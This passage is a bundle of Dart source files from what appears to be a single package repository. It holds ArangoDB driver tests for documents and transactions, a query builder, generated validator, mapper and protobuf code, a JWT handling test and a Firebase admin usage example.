if (answerWithRevision.result.error) {
print(answerWithRevision);
}
expect(answerWithRevision.document['_rev'], equals(testDocumentRev));
// try get doc with noexists revision:
var notExistAnswer = await testDbClient.getDocumentByKey(
testCollection, testDocumentKey,
ifMatchRevision: 'my_wrong_rev');
// we will get error responce:
expect(notExistAnswer.result.error, equals(true));
expect(notExistAnswer.result.code, equals(412));
});
test('update document', () async {
// update document with returnNew:
var updateAnswer = await testDbClient.updateDocument(
testCollection, testDocumentKey, {'Hello': 'University'},
queryParams: {'returnNew': 'true'});
if (updateAnswer.map['new']['Hello'] != 'University') print(updateAnswer);
expect(updateAnswer.map['new']['Hello'], 'University');
// save revision:
testDocumentRev = updateAnswer.map['_rev'] as String;
var matchedUpdateAnswer = await testDbClient.updateDocument(
testCollection, testDocumentKey, {'Hello': 'Underground'},
ifMatchRevision: testDocumentRev);
// document was updated:
expect(matchedUpdateAnswer.oldRev, equals(testDocumentRev));
// try to update not matched revision:
var notMatchedUpdateAnswer = await testDbClient.updateDocument(
testCollection,
testDocumentKey,
{'Bad trying': 'because bad revision'},
ifMatchRevision: 'my_bad_rev');
// we will get error in answer:
expect(notMatchedUpdateAnswer.result.error, equals(true));
expect(notMatchedUpdateAnswer.result.code, equals(412));
});
test('replace document', () async {
// replace document with returnNew:
var replaceAnswer = await testDbClient.replaceDocument(
testCollection, testDocumentKey, {'Goodby': 'Moon'},
queryParams: {'returnNew': 'true'});
if (replaceAnswer.map['new']['Goodby'] != 'Moon') print(replaceAnswer);
expect(replaceAnswer.map['new']['Goodby'], 'Moon');
// save revision:
testDocumentRev = replaceAnswer.map['_rev'] as String;
var matchedReplaceAnswer = await testDbClient.replaceDocument(
testCollection, testDocumentKey, {'Hello': 'Undeground'},
ifMatchRevision: testDocumentRev);
// document was updated:
expect(matchedReplaceAnswer.oldRev, equals(testDocumentRev));
// try to update not matched revision:
var notMatchedReplaceAnswer = await testDbClient.replaceDocument(
testCollection,
testDocumentKey,
{'Bad trying': 'because bad revision'},
ifMatchRevision: 'my_bad_rev');
// we will get error in answer:
expect(notMatchedReplaceAnswer.result.error, equals(true));
expect(notMatchedReplaceAnswer.result.code, equals(412));
});
test('replace multiple documents', () async {
var replaceAnswer = await testDbClient.replaceDocuments(testCollection, [
{'_key': testDocumentKey, 'Good evening': 'Jupiter'}
], queryParams: {
'returnNew': 'true'
});
if (replaceAnswer[0].map['new']['_key'] != testDocumentKey) {
print(replaceAnswer);
}
expect(replaceAnswer[0].map['new']['_key'], testDocumentKey);
});
test('remove document', () async {
var answer = await testDbClient.removeDocument(
testCollection, testDocumentKey,
queryParams: {'returnOld': 'true'});
if (answer.result.error) {
print(answer);
}
expect(answer.map,
allOf(contains('_id'), contains('_key'), contains('_rev')));
if (!answer.map.containsKey('old')) print(answer);
if (answer.map['old']['Good evening'] != 'Jupiter') print(answer);
expect(answer.map['old']['Good evening'], 'Jupiter');
// After this test document with `testDocumentKey` should be deleted.
});
test('create multiple documents', () async {
var answer = await testDbClient.createDocuments(testCollection, [
{'Hello': 'Earth'},
{'Hello': 'Venus'}
]);
// 2 documents was inserted:
expect((answer).length, equals(2));
// about first document:
expect(answer[0].map,
allOf(contains('_id'), contains('_key'), contains('_rev')));
// save documents keys for later tests:
for (var doc in answer) {
testMultipleDocumentsKeys.add(doc.identifier.key);
}
});
test('remove multiple documents', () async {
var answer = await testDbClient.removeDocuments(testCollection, [
// data should contain list of map with _key or _id attributes
// for each document to remove
{
'_key': testMultipleDocumentsKeys[0],
},
{
'_key': testMultipleDocumentsKeys[1],
},
]);
// print('----------> ${answer}');
expect((answer).length, equals(2));
// first of removed documents has the same key as in request body:
expect((answer)[0].map['_key'], equals(testMultipleDocumentsKeys[0]));
});
test('create and abort transaction', () async {
var answer = await testDbClient.beginTransaction(TransactionOptions());
if (answer.result.error) {
print(answer);
}
final abortAnswer =
await testDbClient.abortTransaction(answer.transaction);
expect(answer.transaction.id, isNotEmpty);
expect(answer.transaction.state, TransactionStates.running);
expect(abortAnswer.transaction.state, TransactionStates.aborted);
});
test('create and commit transaction', () async {
var answer = await testDbClient.beginTransaction(TransactionOptions());
if (answer.result.error) {
print(answer);
}
final commitAnswer =
await testDbClient.commitTransaction(answer.transaction);
expect(answer.transaction.id, isNotEmpty);
expect(answer.transaction.state, TransactionStates.running);
expect(commitAnswer.transaction.state, TransactionStates.committed);
});
test('create document and rollback', () async {
final countResult = await testDbClient.documentsCount(testCollection);
final count = countResult.collectionInfo.count ?? 0;
var answer = await testDbClient.beginTransaction(TransactionOptions(
writeCollections: [testCollection],
waitForSync: true,
allowImplicit: true,
));
if (answer.result.error) {
print(answer);
}
final transaction = answer.transaction;
await testDbClient.createDocument(
testCollection,
{'Hello': 'World TRX'},
transaction: transaction,
);
final beforeCount = (await testDbClient.documentsCount(
testCollection,
transaction: transaction,
))
.collectionInfo
.count ??
0;
final extraCount = (await testDbClient.documentsCount(
testCollection,
))
.collectionInfo
.count ??
0;
await testDbClient.abortTransaction(transaction);
final abortCount = (await testDbClient.documentsCount(testCollection))
.collectionInfo
.count ??
0;
expect(beforeCount, count + 1);
expect(extraCount, count);
expect(abortCount, count);
});
test('create document and commit', () async {
final countResult = await testDbClient.documentsCount(testCollection);
final count = countResult.collectionInfo.count ?? 0;
var answer = await testDbClient.beginTransaction(TransactionOptions(
writeCollections: [testCollection],
waitForSync: true,
allowImplicit: true,
));
if (answer.result.error) {
print(answer);
}
final transaction = answer.transaction;
await testDbClient.createDocument(
testCollection,
{'Hello': 'World TRX'},
transaction: transaction,
);
final preCommitCount = (await testDbClient.documentsCount(testCollection))
.collectionInfo
.count ??
0;
final trxCount = (await testDbClient.documentsCount(
testCollection,
transaction: transaction,
))
.collectionInfo
.count ??
0;
final results = await testDbClient.queryToList(
{
// See alse client.queryToStream().
'query': '''
FOR doc IN test_temp_collection
RETURN doc
''',
},
transaction: transaction,
);
final resultCount = results.length;
await testDbClient.commitTransaction(transaction);
final commitCount = (await testDbClient.documentsCount(testCollection))
.collectionInfo
.count ??
0;
expect(commitCount, count + 1);
expect(trxCount, count + 1);
expect(resultCount, count + 1);
expect(preCommitCount, count);
});
test('delete document and abort', () async {
final doc = await testDbClient.createDocument(
testCollection,
{'Hello': 'World For Delete and Abort'},
);
final key = doc.identifier.key;
final countResult = await testDbClient.documentsCount(testCollection);
final count = countResult.collectionInfo.count ?? 0;
var answer = await testDbClient.beginTransaction(TransactionOptions(
writeCollections: [testCollection],
waitForSync: true,
allowImplicit: true,
));
if (answer.result.error) {
print(answer);
}
final transaction = answer.transaction;
var result = await testDbClient.removeDocument(
testCollection,
key,
transaction: transaction,
);
if (result.result.error) {
print(result.result.errorMessage);
}
await testDbClient.abortTransaction(transaction);
final afterCount = (await testDbClient.documentsCount(testCollection))
.collectionInfo
.count ??
0;
expect(afterCount, count);
});
test('delete document and commit', () async {
final doc = await testDbClient.createDocument(
testCollection,
{'Hello': 'World For Delete and Commit'},
);
final key = doc.identifier.key;
final countResult = await testDbClient.documentsCount(testCollection);
final count = countResult.collectionInfo.count ?? 0;
var answer = await testDbClient.beginTransaction(TransactionOptions(
writeCollections: [testCollection],
waitForSync: true,
allowImplicit: true,
));
if (answer.result.error) {
print(answer);
}
final transaction = answer.transaction;
var result = await testDbClient.removeDocument(
testCollection,
key,
transaction: transaction,
);
print(result);
await testDbClient.commitTransaction(transaction);
final afterCount = (await testDbClient.documentsCount(testCollection))
.collectionInfo
.count ??
0;
expect(afterCount, count - 1);
});
var testDbClientWithConnectionString = ArangoDBClient(
scheme: sch,
host: h,
port: p,
db: testDb,
user: u,
pass: ps,
realm: realm);
test('get collection info from connection created with connectionstring',
() async {
var answer =
await testDbClientWithConnectionString.collectionInfo(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
expect(answer.collectionInfo.name, testCollection);
});
test('drop collection', () async {
var answer = await testDbClient.dropCollection(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
});
// back to _system db
test('drop test database', () async {
var answer = await clientSystemDb.dropDatabase(testDb);
if (answer.result.error) {
print(answer);
}
expect(answer.response, equals(true));
});
});
}
<|start_filename|>arango_driver/lib/src/query.dart<|end_filename|>
import 'query/bind_name_value_pair.dart';
import 'query/query_text_fragment.dart';
/// Constructor for constructing query as object from
/// understandable arguments with condition support.
/// Query object do not call database.
/// Query object can be converting to [Map] via toMap() method
/// and used as argument to `query()` method
/// of database client for sending.
/// For debug purpose query object can be printed as [String],
/// because it has toString() method.
/// Sample:
/// ```
/// var query = Query(
/// [
/// Line('LET tag=@tag'),
/// Line('FOR doc in docs'),
/// LineIfThen(
/// tag != null, 'FILTER doc.tags && POSITION(doc.tags, tag )'),
/// Line('SORT doc.datetime'),
/// LineIfThenElse(
/// without_content, 'return UNSET(doc,"content")', 'return doc'),
/// ],
/// bindVars: [BindVarIfThen(tag != null, 'tag', tag)],
/// ).toMap();
/// ```
class Query {
// initial structures are set in constructors:
List<QueryTextFragment> fragments = [];
List<BindNameValuePair> bindVars = [];
// The compiled result from all bindVars:
Map<String, dynamic> bindVarsMap = {};
/// Returns binded vars from query object.
Map<String, dynamic> get bindedVars => bindVarsMap;
Query(this.fragments, {this.bindVars = const []});
/// Like Query() but named constructor.
Query.create(fragments, {List<BindNameValuePair> bindVars = const []}) {
Query(fragments, bindVars: bindVars);
}
/// Returns query string from [Query] object.
String queryString() => fragments
.map((f) => f.toString())
.where((f) => f.isNotEmpty)
.toList()
.cast<String>()
.join('\n');
/// Returns created query object as [Map] structure,
/// which contains keys: `'query'` and `'bindVars'`.
/// The `'query'` key value contains
/// a query text, `queryString()` method result.
/// The `'bindVars'` key value contains
/// a structure with binded variables, `bindedVars` getter result.
Map<String, Object> toMap() {
//let's collect bindVars into a Map:
for (var bv in bindVars) {
bindVarsMap.addAll(bv.bindNameValuePair);
}
var result = {
'query': queryString(),
'bindVars': bindedVars,
};
return result;
}
/// Human readable view of Query object.
/// See `toMap()` method to get created query object as Map structure.
@override
String toString() => toMap().toString();
}
<|start_filename|>entity/test/lib/src/ingredient.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'ingredient.dart';
// **************************************************************************
// ValidatorGenerator
// **************************************************************************
class $IngredientValidator implements Validator {
const $IngredientValidator();
ValidationError? validateDescription(String value, {Ingredient? entity}) {
if (value.length < 10) {
return StringLengthValidationError(
'description',
length: value.length,
minLength: 10,
maxLength: null,
);
}
return null;
}
ValidationError? validateNotes(String? value, {Ingredient? entity}) {
if (value != null && value.length > 10) {
return StringLengthValidationError(
'notes',
length: value.length,
minLength: null,
maxLength: 10,
);
}
return null;
}
ValidationError? validateTag(String? value, {Ingredient? entity}) {
if (value != null && value.length < 2) {
return StringLengthValidationError(
'tag',
length: value.length,
minLength: 2,
maxLength: null,
);
}
return null;
}
ValidationError? validateQuantity(double value, {Ingredient? entity}) {
if (value < 10.0) {
return RangeValidationError('quantity',
value: value, minValue: 10.0, maxValue: 20);
}
if (value > 20) {
return RangeValidationError('quantity',
value: value, minValue: 10.0, maxValue: 20);
}
return null;
}
ValidationError? validatePrecision(Decimal value, {Ingredient? entity}) {
if (value < Decimal.fromInt(10)) {
return RangeValidationError('precision',
value: value, minValue: Decimal.fromInt(10), maxValue: null);
}
return null;
}
ValidationError? validateIntQuantity(int value, {Ingredient? entity}) {
if (value < 10) {
return RangeValidationError('intQuantity',
value: value, minValue: 10, maxValue: 20);
}
if (value > 20) {
return RangeValidationError('intQuantity',
value: value, minValue: 10, maxValue: 20);
}
return null;
}
ValidationError? validateNintQuantity(int? value, {Ingredient? entity}) {
if (value != null && value < 10) {
return RangeValidationError('nintQuantity',
value: value, minValue: 10, maxValue: 20);
}
if (value != null && value > 20) {
return RangeValidationError('nintQuantity',
value: value, minValue: 10, maxValue: 20);
}
return null;
}
ValidationError? validateRInt(int? value, {Ingredient? entity}) {
if (value == null) {
return RequiredValidationError('rInt');
}
if (value < 10) {
return RangeValidationError('rInt',
value: value, minValue: 10, maxValue: 20);
}
if (value > 20) {
return RangeValidationError('rInt',
value: value, minValue: 10, maxValue: 20);
}
return null;
}
ValidationError? $validateDescription(String? value, {Ingredient? entity}) {
if (value == null) {
return RequiredValidationError('description');
}
return validateDescription(value, entity: entity);
}
ValidationError? $validateQuantity(double? value, {Ingredient? entity}) {
if (value == null) {
return RequiredValidationError('quantity');
}
return validateQuantity(value, entity: entity);
}
ValidationError? $validatePrecision(Decimal? value, {Ingredient? entity}) {
if (value == null) {
return RequiredValidationError('precision');
}
return validatePrecision(value, entity: entity);
}
ValidationError? $validateIntQuantity(int? value, {Ingredient? entity}) {
if (value == null) {
return RequiredValidationError('intQuantity');
}
return validateIntQuantity(value, entity: entity);
}
@override
ErrorList validate(covariant Ingredient entity) {
var errors = <ValidationError>[];
ValidationError? error;
if ((error = validateDescription(entity.description, entity: entity)) !=
null) {
errors.add(error!);
}
if ((error = validateNotes(entity.notes, entity: entity)) != null) {
errors.add(error!);
}
if ((error = validateTag(entity.tag, entity: entity)) != null) {
errors.add(error!);
}
if ((error = validateQuantity(entity.quantity, entity: entity)) != null) {
errors.add(error!);
}
if ((error = validatePrecision(entity.precision, entity: entity)) != null) {
errors.add(error!);
}
if ((error = validateIntQuantity(entity.intQuantity, entity: entity)) !=
null) {
errors.add(error!);
}
if ((error = validateNintQuantity(entity.nintQuantity, entity: entity)) !=
null) {
errors.add(error!);
}
if ((error = validateRInt(entity.rInt, entity: entity)) != null) {
errors.add(error!);
}
return ErrorList(errors);
}
@override
void validateThrowing(covariant Ingredient entity) {
var errors = validate(entity);
if (errors.validationErrors.isNotEmpty) throw errors;
}
}
<|start_filename|>firebase-auth-admin/lib/src/firebase_admin_exception.dart<|end_filename|>
class FirebaseAdminException implements Exception {
final String message;
FirebaseAdminException(this.message);
}
<|start_filename|>defaults_provider/test/lib/src/recipe.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'recipe.dart';
// **************************************************************************
// DefaultsProviderGenerator
// **************************************************************************
abstract class $RecipeDefaultsProviderBase {
const $RecipeDefaultsProviderBase();
Recipe createWithDefaults({
String? key,
String? title,
List<Ingredient>? ingredients,
int? numPosts,
double? doubleNumPosts,
Decimal? decimalNumPosts,
Ingredient? mainIngredient,
Category? category,
}) {
return Recipe(
key: key ?? this.key,
title: title ?? this.title,
ingredients: ingredients ?? this.ingredients,
numPosts: numPosts ?? this.numPosts,
doubleNumPosts: doubleNumPosts ?? this.doubleNumPosts,
decimalNumPosts: decimalNumPosts ?? this.decimalNumPosts,
mainIngredient: mainIngredient ?? this.mainIngredient,
category: category ?? this.category,
);
}
String get key => '';
String get title => '';
List<Ingredient> get ingredients => const [];
int get numPosts => 0;
double get doubleNumPosts => 0;
Decimal get decimalNumPosts => Decimal.zero;
Ingredient get mainIngredient =>
$IngredientDefaultsProvider().createWithDefaults();
Category get category;
}
<|start_filename|>proto_mapper/test/lib/grpc/key.pbjson.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: key.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields,deprecated_member_use_from_same_package
import 'dart:core' as $core;
import 'dart:convert' as $convert;
import 'dart:typed_data' as $typed_data;
@$core.Deprecated('Use gKeyDescriptor instead')
const GKey$json = {
'1': 'GKey',
'2': [
{'1': 'key', '3': 1, '4': 1, '5': 9, '10': 'key'},
],
};
/// Descriptor for `GKey`. Decode as a `google.protobuf.DescriptorProto`.
final $typed_data.Uint8List gKeyDescriptor =
$convert.base64Decode('CgRHS2V5EhAKA2tleRgBIAEoCVIDa2V5');
@$core.Deprecated('Use gListOfKeyDescriptor instead')
const GListOfKey$json = {
'1': 'GListOfKey',
'2': [
{'1': 'items', '3': 1, '4': 3, '5': 11, '6': '.GKey', '10': 'items'},
],
};
/// Descriptor for `GListOfKey`. Decode as a `google.protobuf.DescriptorProto`.
final $typed_data.Uint8List gListOfKeyDescriptor = $convert
.base64Decode('CgpHTGlzdE9mS2V5EhsKBWl0ZW1zGAEgAygLMgUuR0tleVIFaXRlbXM=');
<|start_filename|>grpc_host/lib/src/hosting/host_parameters.dart<|end_filename|>
import 'dart:isolate';
import 'package:grpc_host/grpc_host.dart';
class HostParameters<TAppSettings> {
final SendPort sendPort;
final Settings settings;
const HostParameters(
this.sendPort,
this.settings,
);
}
<|start_filename|>map_mapper/test_mongo/lib/src/recipe.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'recipe.dart';
// **************************************************************************
// MapMapGenerator
// **************************************************************************
class $RecipeMapMapper extends MapMapper<Recipe> {
const $RecipeMapMapper();
@override
Recipe fromMap(Map<String, dynamic> map) {
final $kh = const MongoKeyHandler();
return Recipe(
key: $kh.keyFromMap(map, 'key'),
title: map['title'] as String,
description: map['description'] as String?,
categoryKey: $kh.keyFromMap(map, 'categoryKey'),
secondaryCategoryKey: map['secondaryCategoryKey'] == null
? null
: $kh.keyFromMap(map, 'secondaryCategoryKey'),
category: const $CategoryMapMapper().fromMap(map['category']),
ingredients: List<Ingredient>.unmodifiable(map['ingredients']
.map((e) => const $IngredientMapMapper().fromMap(e))),
publishDate: DateTime.parse(map['publishDate']),
expiryDate:
map['expiryDate'] == null ? null : DateTime.parse(map['expiryDate']),
preparationDuration: Duration(milliseconds: map['preparationDuration']),
totalDuration: map['totalDuration'] == null
? null
: Duration(milliseconds: map['totalDuration']),
isPublished: map['isPublished'] as bool,
requiresRobot: map['requiresRobot'] as bool?,
mainApplianceType: ApplianceType.values[map['mainApplianceType'] as int],
secondaryApplianceType: map['secondaryApplianceType'] == null
? null
: ApplianceType.values[map['secondaryApplianceType'] as int],
tags: List<String>.unmodifiable(map['tags']),
extraTags: map['extraTags'] == null
? null
: List<String>.unmodifiable(map['extraTags']),
);
}
@override
Map<String, dynamic> toMap(Recipe instance) {
final $kh = const MongoKeyHandler();
final map = <String, dynamic>{};
$kh.keyToMap(map, instance.key, 'key');
map['title'] = instance.title;
map['description'] = instance.description;
$kh.keyToMap(map, instance.categoryKey, 'categoryKey');
$kh.keyToMap(
map, instance.secondaryCategoryKey ?? '', 'secondaryCategoryKey');
map['category'] = const $CategoryMapMapper().toMap(instance.category);
map['ingredients'] = instance.ingredients
.map((e) => const $IngredientMapMapper().toMap(e))
.toList();
map['publishDate'] = instance.publishDate.toIso8601String();
map['expiryDate'] = instance.expiryDate?.toIso8601String();
map['preparationDuration'] = instance.preparationDuration.inMilliseconds;
map['totalDuration'] = instance.totalDuration?.inMilliseconds;
map['isPublished'] = instance.isPublished;
map['requiresRobot'] = instance.requiresRobot;
map['mainApplianceType'] = instance.mainApplianceType.index;
map['secondaryApplianceType'] = instance.secondaryApplianceType?.index;
map['tags'] = instance.tags;
map['extraTags'] = instance.extraTags;
return map;
}
}
extension $RecipeMapExtension on Recipe {
Map<String, dynamic> toMap() => const $RecipeMapMapper().toMap(this);
static Recipe fromMap(Map<String, dynamic> map) =>
const $RecipeMapMapper().fromMap(map);
}
extension $MapRecipeExtension on Map<String, dynamic> {
Recipe toRecipe() => const $RecipeMapMapper().fromMap(this);
}
class $RecipeFieldNames {
final $kh = const MongoKeyHandler();
final String fieldName;
final String prefix;
$RecipeFieldNames.sub(this.fieldName) : prefix = fieldName + '.';
const $RecipeFieldNames()
: fieldName = '',
prefix = '';
static const _key = 'key';
String get key => prefix + $kh.fieldNameToMapKey(_key);
static const _title = 'title';
String get title => prefix + _title;
static const _description = 'description';
String get description => prefix + _description;
static const _categoryKey = 'categoryKey';
String get categoryKey => prefix + $kh.fieldNameToMapKey(_categoryKey);
static const _secondaryCategoryKey = 'secondaryCategoryKey';
String get secondaryCategoryKey =>
prefix + $kh.fieldNameToMapKey(_secondaryCategoryKey);
static const _category = 'category';
$CategoryFieldNames get category =>
$CategoryFieldNames.sub(prefix + _category);
static const _ingredients = 'ingredients';
$IngredientFieldNames get ingredients =>
$IngredientFieldNames.sub(prefix + _ingredients);
static const _publishDate = 'publishDate';
String get publishDate => prefix + _publishDate;
static const _expiryDate = 'expiryDate';
String get expiryDate => prefix + _expiryDate;
static const _preparationDuration = 'preparationDuration';
String get preparationDuration => prefix + _preparationDuration;
static const _totalDuration = 'totalDuration';
String get totalDuration => prefix + _totalDuration;
static const _isPublished = 'isPublished';
String get isPublished => prefix + _isPublished;
static const _requiresRobot = 'requiresRobot';
String get requiresRobot => prefix + _requiresRobot;
static const _mainApplianceType = 'mainApplianceType';
String get mainApplianceType => prefix + _mainApplianceType;
static const _secondaryApplianceType = 'secondaryApplianceType';
String get secondaryApplianceType => prefix + _secondaryApplianceType;
static const _tags = 'tags';
String get tags => prefix + _tags;
static const _extraTags = 'extraTags';
String get extraTags => prefix + _extraTags;
@override
String toString() => fieldName;
}
<|start_filename|>squarealfa_security/test/security_test.dart<|end_filename|>
import 'dart:convert';
import 'package:squarealfa_security/squarealfa_security.dart';
import 'package:test/test.dart';
void main() {
var secret = '<KEY>';
group('Token generation', () {
var claims = JwtPayload(
name: '<NAME>',
email: '<EMAIL>',
subject: '5f35bd0489d72e2cd430f78d',
issuer: 'Our Server',
audience: 'Our Server',
notBefore: DateTime.now(),
tid: 'abc',
tenantId: '123',
expires: DateTime.now().add(Duration(seconds: 300)));
var tokenGenerator = JsonWebTokenHandler(secret);
var jwt = tokenGenerator.generate(claims);
test('token should have 3 parts', () {
var parts = jwt.split('.');
expect(parts.length, 3);
});
test('header type should be JWT', () {
var parts = jwt.split('.');
var header = utf8.decode(base64Decode(parts[0]));
var map = jsonDecode(header) as Map<String, dynamic>;
expect(map['typ'], 'JWT');
});
test('body should contain claims', () {
var parts = jwt.split('.');
var body = decodeB64Json(parts[1]);
var map = jsonDecode(body) as Map<String, dynamic>;
expect(map['name'], '<NAME>');
expect(map['email'], '<EMAIL>');
});
test('tenantId is correct', () {
var parts = jwt.split('.');
var body = decodeB64Json(parts[1]);
var map = jsonDecode(body) as Map<String, dynamic>;
expect(map['tenantId'], '123');
});
test('tid is correct', () {
var parts = jwt.split('.');
var body = decodeB64Json(parts[1]);
var map = jsonDecode(body) as Map<String, dynamic>;
expect(map['tid'], 'abc');
});
});
group('Token loading', () {
test('Subject is correct', () {
var tokenGenerator = JsonWebTokenHandler(secret);
var jwt =
'<KEY>';
var payload = tokenGenerator.load(jwt);
expect(payload.subject, '5f35bd0489d72e2cd430f78d');
});
test('Subject is correct', () {
var tokenGenerator = JsonWebTokenHandler(secret);
var jwt =
'<KEY>';
var payload = tokenGenerator.load(jwt);
expect(payload.subject, '5f35bd0489d72e2cd430f78d');
});
});
}
<|start_filename|>firebase-auth-admin/example/firebase_auth_admin_example.dart<|end_filename|>
import 'package:firebase_auth_admin/firebase_auth_admin.dart' as firebase;
void main() async {
// first we need to initialize the API
// this should always be one of the first
// calls in your main function, in
// your main isolate.
firebase.initialize('service-account.json');
// the following code creates a John Doe user:
final usr = firebase.FirebaseCreateUser(
info: firebase.FirebaseUserInfo(
email: '<EMAIL>',
displayName: '<NAME>',
password: '<PASSWORD>',
disabled: false,
emailVerified: true,
photoUrl: 'https://www.somewhere.com/myself.jpg',
),
);
// please note that this can be
// called from any isolate (and there)
// is no need to call initialize again
// from new isolates.
final uid = await firebase.createUser(usr);
// we can set custom claims to users.
// for example, we may want to add
// subscription expiration date on the
// user's account
await firebase.setCustomClaims(
uid,
{
'subscriptionExpiry':
DateTime.now().add(Duration(days: 365)).millisecondsSinceEpoch / 1000,
},
);
// all other easily accessed functions
// we may even delete users (careful):
await firebase.deleteUser(uid);
}
<|start_filename|>grpc_host/example/demo_service.pb.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: demo_service.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields
import 'dart:core' as $core;
import 'package:protobuf/protobuf.dart' as $pb;
class GPerson extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GPerson',
createEmptyInstance: create)
..aOS(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'key')
..aOS(
2,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'name')
..hasRequiredFields = false;
GPerson._() : super();
factory GPerson({
$core.String? key,
$core.String? name,
}) {
final _result = create();
if (key != null) {
_result.key = key;
}
if (name != null) {
_result.name = name;
}
return _result;
}
factory GPerson.fromBuffer($core.List<$core.int> i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GPerson.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GPerson clone() => GPerson()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GPerson copyWith(void Function(GPerson) updates) =>
super.copyWith((message) => updates(message as GPerson))
as GPerson; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GPerson create() => GPerson._();
GPerson createEmptyInstance() => create();
static $pb.PbList<GPerson> createRepeated() => $pb.PbList<GPerson>();
@$core.pragma('dart2js:noInline')
static GPerson getDefault() =>
_defaultInstance ??= $pb.GeneratedMessage.$_defaultFor<GPerson>(create);
static GPerson? _defaultInstance;
@$pb.TagNumber(1)
$core.String get key => $_getSZ(0);
@$pb.TagNumber(1)
set key($core.String v) {
$_setString(0, v);
}
@$pb.TagNumber(1)
$core.bool hasKey() => $_has(0);
@$pb.TagNumber(1)
void clearKey() => clearField(1);
@$pb.TagNumber(2)
$core.String get name => $_getSZ(1);
@$pb.TagNumber(2)
set name($core.String v) {
$_setString(1, v);
}
@$pb.TagNumber(2)
$core.bool hasName() => $_has(1);
@$pb.TagNumber(2)
void clearName() => clearField(2);
}
class GPersonInsertResult extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GPersonInsertResult',
createEmptyInstance: create)
..aOS(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'key')
..hasRequiredFields = false;
GPersonInsertResult._() : super();
factory GPersonInsertResult({
$core.String? key,
}) {
final _result = create();
if (key != null) {
_result.key = key;
}
return _result;
}
factory GPersonInsertResult.fromBuffer($core.List<$core.int> i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GPersonInsertResult.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GPersonInsertResult clone() => GPersonInsertResult()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GPersonInsertResult copyWith(void Function(GPersonInsertResult) updates) =>
super.copyWith((message) => updates(message as GPersonInsertResult))
as GPersonInsertResult; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GPersonInsertResult create() => GPersonInsertResult._();
GPersonInsertResult createEmptyInstance() => create();
static $pb.PbList<GPersonInsertResult> createRepeated() =>
$pb.PbList<GPersonInsertResult>();
@$core.pragma('dart2js:noInline')
static GPersonInsertResult getDefault() => _defaultInstance ??=
$pb.GeneratedMessage.$_defaultFor<GPersonInsertResult>(create);
static GPersonInsertResult? _defaultInstance;
@$pb.TagNumber(1)
$core.String get key => $_getSZ(0);
@$pb.TagNumber(1)
set key($core.String v) {
$_setString(0, v);
}
@$pb.TagNumber(1)
$core.bool hasKey() => $_has(0);
@$pb.TagNumber(1)
void clearKey() => clearField(1);
}
<|start_filename|>defaults_provider/test/lib/src/ingredient.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'ingredient.dart';
// **************************************************************************
// DefaultsProviderGenerator
// **************************************************************************
class $IngredientDefaultsProvider {
const $IngredientDefaultsProvider();
Ingredient createWithDefaults({
String? description,
double? quantity,
}) {
return Ingredient(
description: description ?? this.description,
quantity: quantity ?? this.quantity,
);
}
String get description => '';
double get quantity => 0;
}
<|start_filename|>proto_mapper/test/lib/src/appliance_type.dart<|end_filename|>
import 'package:proto_annotations/proto_annotations.dart';
import 'package:proto_generator_test/grpc/appliance_type.pbenum.dart';
part 'appliance_type.g.dart';
@proto
@mapProto
enum ApplianceType {
heat,
cold,
cutlery,
}
<|start_filename|>entity_adapter/example/lib/src/person.dart<|end_filename|>
import 'package:example/grpc/person.pb.dart';
import 'package:squarealfa_entity_adapter/squarealfa_entity_adapter.dart';
import 'asset.dart';
import 'entity.dart';
part 'person.g.dart';
@entity
class Person extends Entity {
final List<Asset> assets;
final String name;
Person({
required this.assets,
required this.name,
});
}
<|start_filename|>grpc_host/lib/grpc_host.dart<|end_filename|>
export 'src/configuration/configuration.dart';
export 'src/hosting/hosting.dart';
export 'src/security/security.dart';
export 'src/services/services.dart';
export 'src/containerization/containerization.dart';
<|start_filename|>squarealfa_security/lib/src/firebase_token_handler.dart<|end_filename|>
